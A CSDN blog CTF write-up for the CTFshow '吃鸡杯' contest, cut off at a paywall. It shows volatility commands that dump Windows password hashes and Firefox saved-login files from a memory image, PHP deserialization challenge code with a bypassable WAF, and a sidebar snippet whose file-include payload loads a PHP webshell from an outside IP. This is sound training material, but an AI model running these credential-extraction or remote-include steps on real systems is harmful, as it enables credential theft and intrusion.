[CTFshow]吃鸡杯

最新推荐文章于 2024-04-28 13:35:54 发布
最新推荐文章于 2024-04-28 13:35:54 发布
阅读量1k 收藏 1
点赞数
分类专栏: 比赛wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/119418600
版权

在?看看密码

给了一个vmem文件,内存取证
在这里插入图片描述
搞密码肯定一开始想到系统用户的密码

volatility --profile=Win7SP1x64 -f looklookpassword.vmem hivelist

在这里插入图片描述

volatility --profile=Win7SP1x64 -f looklookpassword.vmem hashdump -y 0xfffff8a000024010 -s 0xfffff8a000dd7010

找一下竟然没有密码
在这里插入图片描述

那可能是浏览器里面保存了的密码

 volatility --profile=Win7SP1x64 -f looklookpassword.vmem pslist

Firefox的很多,先试试这个
在这里插入图片描述
需要dump出两个文件
key4.dblogins.json

volatility -f looklookpassword.vmem --profile=Win7SP1x64 filescan |grep 'key4.db'
volatility -f looklookpassword.vmem --profile=Win7SP1x64 filescan |grep 'logins.json'

在这里插入图片描述
在这里插入图片描述
dump出来

volatility -f looklookpassword.vmem --profile=Win7SP1x64 dumpfiles -Q 0x000000003d6ab4b0 -D ./
volatility -f looklookpassword.vmem --profile=Win7SP1x64 dumpfiles -Q 0x000000003ec70d00 -D ./

把名字改成key4.db和logins.json
在这里插入图片描述
打开passwordfox,选择这个文件夹,他会自动搞出密码
在这里插入图片描述

cjbweb

<?php
error_reporting(0);
$safe="Hack me!";

class Hacker{
   
    public $name="var_dump";
    public $msg="Happy to cjb";
    public function __wakeup()
    {
   
        global $safe;
        if(preg_match('/\d|\/|,|\([^()]*\([^()]*\)/',$this->msg)){
   
            $this->name="var_dump";
            $this->msg="You look dangerous!!!";
            $safe="I think waf is enough.";
        }
        call_user_func($this->name,$this->msg);
    }
    public function __destruct()
    {
   
        global $safe;
        var_dump($safe);
    }
}

if(isset($_POST['info'])){
   
    $info=$_POST['info'];
    if(
最低0.47元/天 解锁文章
huamanggg
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow XSS专题
yink12138的博客
12-17 1480
ctfshow XSS专题
CTFShow2021七月赛Web
feng的博客
07-10 953
CTFShow2021七月赛Web warmup $ext = pathinfo($_GET['file'], PATHINFO_EXTENSION); if($ext==='php'){ include $_GET['file']; } 要求文件后缀为php,经过测试可以远程文件包含。VPS上写个php马直接包含即可。 ?file=http://118.31.168.198:39543/feng.php 0=phpinfo(); 存在disable_functi
详细了解CSP绕过
最新发布
2301_79323180的博客
04-28 1745
CSP(Content Security Policy)即内容安全策略,为了缓解很大一部分潜在的跨站脚本问题,浏览器的扩展程序系统引入了内容安全策略(CSP)的一般概念。这将引入一些相当严格的策略,会使扩展程序在默认情况下更加安全,开发者可以创建并强制应用一些规则,管理网站允许加载的内容。CSP的实质就是白名单机制,对网站加载或执行的资源进行安全策略的控制。
[ctf.show.reverse] 杯 ezmore,有手就行,EzAutoRe
weixin_52640415的博客
04-27 489
ezmore 动调的题,跟进去在4019d6下断点看比较情况得到neft输入后得到flag组成提示 有手就行 一上来就猜入口是_main然后解到一个fake s2 = [99,23,113,2,106,5,114,9,109,2,93,36,75,62,97,13,100,15,106,53,83,50,89,60,3,60,65] s1 = [0]*len(s2) s1[0] = 99 #~(*(v1 - 2) & v2) & (*(v1 - 2) ^ v2) #~(s1[i-1
CTFshow-杯-RE
qq_52974719的博客
08-02 672
这里写目录标题1、ezmore2、有手就行 1、ezmore 1、初步分析 exe文件,直接运行,可知要得到与flag相关的信息需要输入正确的文件下载码。 查下壳:32二位文件,直接ida32打开 2、静态分析 最开始的输入,然后跟一个if判断,其中i=2时为主要逻辑。 str内存储着我们输入的下闸码,接着进入了e2edef40ecaa776b8d32d58416998这个函数进行检验,v2是我们输入的编号,毫无疑问v2=8 函数主要是生成了一个str2,和我们的输入str1最终进行比较,可知前几句主
ctfshow-杯-Crypto-Writeup
mxx307的博客
07-12 1181
杯部分wpCryptoCop! Run!!题目思路才艺表演海那边漂来的漂流瓶群主说要出简单的题目大家把这题想简单一点The Dedication of Suspect MMisc信守着承诺 Crypto Cop! Run!! 题目 from Crypto.Util.number import * from flag import flag n = 1 << 8 p = getPrime(n) print(p) P.<t> = PolynomialRing(Zmod(p)) f
ctfshow 2021/7/9-10 杯 6题
mumuzi的博客
07-10 1396
群主说要出简单的题目大家把这题想简单一点 直接把c转字符串即可 from libnum import * print(n2s(7539424334663709603622451394173266049480031393220309445902319310504736287365860451132752036622339554159799611768328686792828750952551268647863160547774237934958072391797341405165512721597085695
CTFshow_warmup
tlp_zzm的博客
04-02 352
还有一个点就是这里的result其实没啥用,这个加密函数其实还是以指针寻址,对单个字节进行加密,这个函数返回类型其实应该是void,但IDA反编译成了int64,你可以在int64按下v键将其变成无参数返回类型的函数,或者按y键改为void类型的函数。还是老样子,忽略一切与明文无关的代码,这里源代码主要做了几个处理,第一个就是通过fgets输入的时候会把换行符输入到数组里面,后面if只是把对应的参数改为0了,key的话,动调直接得出来。if函数就是把换行符换成00,没啥用,加密函数循环127次也没啥用。
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ezXSS:ezXSS是渗透测试人员和漏洞赏金猎人测试(盲目)跨站点脚本的一种简便方法
02-05
ezXSS是渗透测试人员和漏洞赏金猎人测试(盲目)跨站点脚本的一种简便方法。 产品特点 易于使用的仪表板,带有统计信息,有效载荷,查看/共享/搜索报告 有效载荷发生器 通过邮件,电报或自定义回调URL发出即时警报 自定义JavaScript负载 自定义有效负载链接以区分插入点 阻止,白名单和其他过滤器 通过电子邮件或其他ezXSS用户通过直接链接共享报告 使用两因素(2FA)保护您的登录 可以在易受攻击的页面上收集以下信息: 页面的URL IP地址 任何页面引荐来源网址(或共享引荐来源网址) 用户代理 所有非HTTP专用Cookie 所有区域设置存储 所有会话存储 页面的完整HTML
Xss测试平台.zip
03-06
XSSer——用于检测和利用XSS漏洞的自动Web测试框架工具 XSS是一种非常常见的漏洞类型,它分布非常广泛,且比较容易被检测到。 攻击者可以在无需验证的情况下将不受信任的JavaScript片段插入到应用程序中。然后,该JavaScript片段将会被访问目标站点的受害者执行。https://gbhackers.com/a3-cross-site-scripting-xss/ 跨站点“Scripter”(又名Xsser)是一个自动框架,用于检测、利用和报告基于Web的应用程序中的XSS漏洞。 它包含几个可以绕过某些过滤器的选项,以及各种特殊的代码注入技术。
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
CTFweb WarmUp解析
weixin_43404314的博客
12-19 422
首先查看源码 返回到图片页面打开source.php文件 发现还包含的有一个文件,于是再次返回图片页面打开hint.php 得到 %253F绕过 即可得flag. 第一次写,不喜勿喷 ...
CTF刷题第三周
m0re's blog
04-01 2419
本文目录Misc坚持60s Misc 坚持60s 打开发现是个java写的小程序好像,看了一脸懵*。 完全没搞懂咋玩,也不会动。一点思路都没有。 看wp,提到了一个java反编译的工具。没见过这种题。没见过就要记下来嘛,而且我最喜欢的就是玩这种我不知道的工具,又可以收一个。 jd-gui,这个工具,下载链接jd-gui提取码9ggk 下载后不用解压,我分享的是文件夹。直接打开工具用(无需安装)...
攻防世界--Web进阶--Web_php_unserialize--反序列化---正则表达式---wakeup绕过----base64加密
z2560088的博客
10-10 1243
来自攻防世界的一道web进阶题,名为Web_php_unserialize 题目给出了一段php代码,应该是后台的部分源码: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file;//将file变量的文件名赋值给当前类的file。当解构出该类实例化的对象后,该对象的file就是此时赋值的fi..
ctfshow XSS
quan9i的博客
06-28 1153
ctfshow XSS 316-333
ctfshow渔人杯
09-14
ctfshow渔人杯是一个CTF(Capture The Flag)比赛,它是以网络安全为主题的竞赛。在这个比赛中,参赛者需要解决各种网络安全相关的问题,包括密码学、漏洞利用、逆向工程等。比赛的目标是通过获取旗帜(flag)来获得分数。 在引用中提到了一个flag: flag{8f9ed2f933ef14a8d0523d0349e1299c}。这是一个由数字和字母组成的字符串,通常在CTF比赛中表示获得了一个旗帜。 引用中提到了另一个flag: ctfshow{a15b2830-dcf4-4344-99e5-350a561cbf89}。这个flag是一个由字母和数字组成的字符串,通常也在CTF比赛中表示获得了一个旗帜。 引用中提到了ctfshow渔人杯的一些其他信息,包括比赛的题目和一些描述。 综上所述,ctfshow渔人杯是一个与网络安全相关的CTF比赛,参赛者需要解决各种网络安全问题并获取旗帜来获得分数。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值